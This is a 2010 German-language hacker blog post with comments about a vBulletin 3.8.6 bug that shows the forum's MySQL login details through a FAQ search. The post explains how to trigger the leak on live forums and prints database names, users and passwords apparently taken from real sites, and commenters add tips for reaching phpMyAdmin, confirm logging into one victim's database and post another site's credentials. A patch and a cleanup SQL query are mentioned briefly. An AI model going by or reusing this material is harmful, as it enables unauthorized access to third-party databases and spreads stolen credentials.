Header
Jul 21 2010

vBulletin® 3.8.6 faq.php Vulnerability

posted by J0hn.X3r Exploits

Ist vllt schon dem ein oder anderen bekannt, aber ich find das echt interessant, dass einer großen und maechtigen Forensoftware wie vBulletin der Fehler unterlaufen kann, dass die MySQL Zugangsdaten fuer jede beliebige Person sichtbar werden kann.

Die Luecke wurde heute nachmittag veroeffentlicht und vBulletin reagierte mit einem Patch darauf.

Die faq.php wurde nur indirekt davon betroffen und dient eher als “Ausgabe”, da ein Fehler in den phrases dafuer verantwortlich war.

Wo befindet sich die Luecke?

Schauen wir uns mal die /install/vbulletin-language-de-du.xml Datei an und suchen nach “database_ingo” – was finden wir? Ah, interessant:

<phrase name="database_ingo" date="1277901074" username="Adduco" version="3.8.6"><![CDATA[Datenbank-Name: {$vbulletin->config['Database']['dbname']}<br />
Datenbank-Server: {$vbulletin->config['MasterServer']['servername']}<br />
Datenbank-Port: {$vbulletin->config['MasterServer']['port']}<br />
Datenbank-Benutzername: {$vbulletin->config['MasterServer']['username']}<br />
Datenbank-Kennwort: {$vbulletin->config['MasterServer']['password']}]]></phrase>

Es werden uns also unsere MySQL Datenbank Daten ausgegeben.

In der englischen Version sieht das ganze aehnlich aus /install/vbulletin-language.xml line 3701:

<phrase name="database_ingo" date="1271086009" username="Jelsoft" version="3.8.5"><![CDATA[Database Name: {$vbulletin->config['Database']['dbname']}<br />
Database Host: {$vbulletin->config['MasterServer']['servername']}<br />
Database Port: {$vbulletin->config['MasterServer']['port']}<br />
Database Username: {$vbulletin->config['MasterServer']['username']}<br />
Database Password: {$vbulletin->config['MasterServer']['password']}]]></phrase>

Wie nutze ich das nun aus?
Wir suchen uns ein Forum, welches von dieser Luecke betroffen ist, klicken oben auf “Hilfe”/”FAQ”, geben bei “Suchbegriffe” bzw. “Search Word(s):” dann “Datenbank” (bzw. database) ein und sehen dann, aha, erster Treffer:

Datenbank-Name: vbulletin
Datenbank-Server: localhost
Datenbank-Port: 3306
Datenbank-Benutzername: root
Datenbank-Kennwort: my4moo

Bzw. auf nem englischen Board:

Database Name: pro_astrogaming_com
Database Host: localhost
Database Port: 3306
Database Username: pro_astrogaming
Database Password: gitl0st

Screenshot

Auf das, was man damit anfangen kann, brauche ich denk ich nicht weiter drauf eingehen.

Wie schuetze ich mich davor?
Wie oben bereits gepostet durch einen Patch von der offiziellen vBulletin Seite, oder durch ein MySQL Query:

DELETE FROM `vb_phrase` WHERE `varname`='database_ingo'

Soviel dazu erstmal, wuensch euch noch eine schoene Woche 🙂


Tweets that mention J0hn.X3r :: Exploits :: vBulletin® 3.8.6 faq.php Vulnerability -- Topsy.com at 22. July 2010, 00:04

[…] This post was mentioned on Twitter by #vBulletin, J0hn.X3r. J0hn.X3r said: Neuer Blogeintrag, ueber #vBulletin 3.8.6 vuln | http://j0hnx3r.org/?p=623 […]

omg at 22. July 2010, 00:15

wie hart ist das denn bitte -_*

D34dl1nk at 22. July 2010, 02:40

Das is doch nur dummes gerede: kuck hier das forum.

http://www.lenameyerlandrut-fanclub.de/

gibt gar keine infos über datenbank.

123 at 22. July 2010, 07:53

da ist auch bereits der patch installiert, trottel

vBulletin® 3.8.6 faq.php Vulnerability | bursali's Blog | Home of the CyberTerrorist! at 22. July 2010, 10:42

[…] Danke für diesen interessanten Beitrag J0hn.X3r (: Quelle.. […]

J0hn.X3r at 22. July 2010, 10:55

m00n hats erkannt.

anonymous at 22. July 2010, 11:09

nur was genau kann man jetzt damit anfangen außer zu versuchen ob die daten mit dem admin des forums übereinstimmen? von außen kann man ja nicht auf die mysql database zugreifen.

st34la at 22. July 2010, 12:35

D34dl1nk du FAIL-Head.

J0hn.X3r at 22. July 2010, 17:03

kannst prinzipiell erstmal versuchen nachm phpmyadmin zu suchen.. gibt mind. 2 Moeglichkeiten:
phpmyadmin.seite.de
seite.de/phpmyadmin

PitBull at 22. July 2010, 17:32

Wow. Krass! Grad Astrogaming.com als Beispiel. Anmeldung an der Datenbank von außerhalb möglich! Und das bei vBulletin.

Vielen Dank für diesen Post, Klasse!

D34d at 23. July 2010, 02:56

na dann waren die schnell im fixxen.
weiss einer wie ich an das phpmyadmin komme.
er hat cpanel.
und phpmyadmin.site.com oder site.com/phpmyadmin geht auch nich.

anonymous at 23. July 2010, 12:36

@admin super, danke. hab erst mal nur ans admincp gedacht, aber das ist ja nur für vBulletin selbst. auf phpmyadmin bin ich nicht gekommen 😛

Datensicherheit: Kritsche Sicherheitslücke in Forensoftware vBulletin - datensicherheit.de Informationen zu Datenschutz und Datensicherheit at 23. July 2010, 14:51

[…] 21.07.2010 vBulletin® 3.8.6 faq.php Vulnerability Fügen Sie diesen Artikel zu den folgenden Social-Bookmarking-Diensten hinzu: Diese Icons […]

girl nextdoor at 7. August 2010, 08:42

Think of how retarded the average guy is, and realize halve of them are stupider than that.

Max_R at 11. August 2010, 13:56

I would like to exchange links with your site j0hnx3r.org
Is this possible?

real hacker at 21. August 2010, 00:41

Funktioniert nicht auf einem hackingboard das Vb 3.8.4 benutzt!
100%ig haben sie kein patch benutzt weil sie eine nulled version benutzen.Tja sind wohl die besten:D

real hacker at 21. August 2010, 11:47

Hab grad gesehen dass nur die v3.8.6 betroffen ist?
Sind ältere versionen davon nicht betroffen?

J0hn.X3r at 7. September 2010, 15:57

Es ist ausschließlich nur die 3.8.6 betroffen, aeltere sind es NICHT und vB 3.8.6 PL1 (patch level 1) ist davon NICHT betroffen.

YaZZn` at 24. September 2010, 15:27

Database Name: sfr
Database Host: localhost
Database Port: 3306
Database Username: sfr
Database Password: sambo1287

http://southfloridaracing.com

enjoy 😉

Jamel Mille at 18. December 2010, 22:21

Really interesting point of view, notes taken

Peter at 19. September 2011, 14:47

Hallo, ich habe Ihre Seite über Google gefunden und muss sagen, dass diese mir sehr gefällt! Schön übersichtlich und informativ 🙂

Es sollte mehr solcher qualitativen Seiten geben!

MFG Peter

vBulletin® 4.x SQL Injection Vulnerability | J0hn.X3r J0hn.X3r at 4. January 2015, 12:32

[…] dem letzten Knueller von vBulletin, habe ich eigentlich nicht mehr mit einer gravierenden Luecke gerechnet. Doch am […]


Write a comment

Comment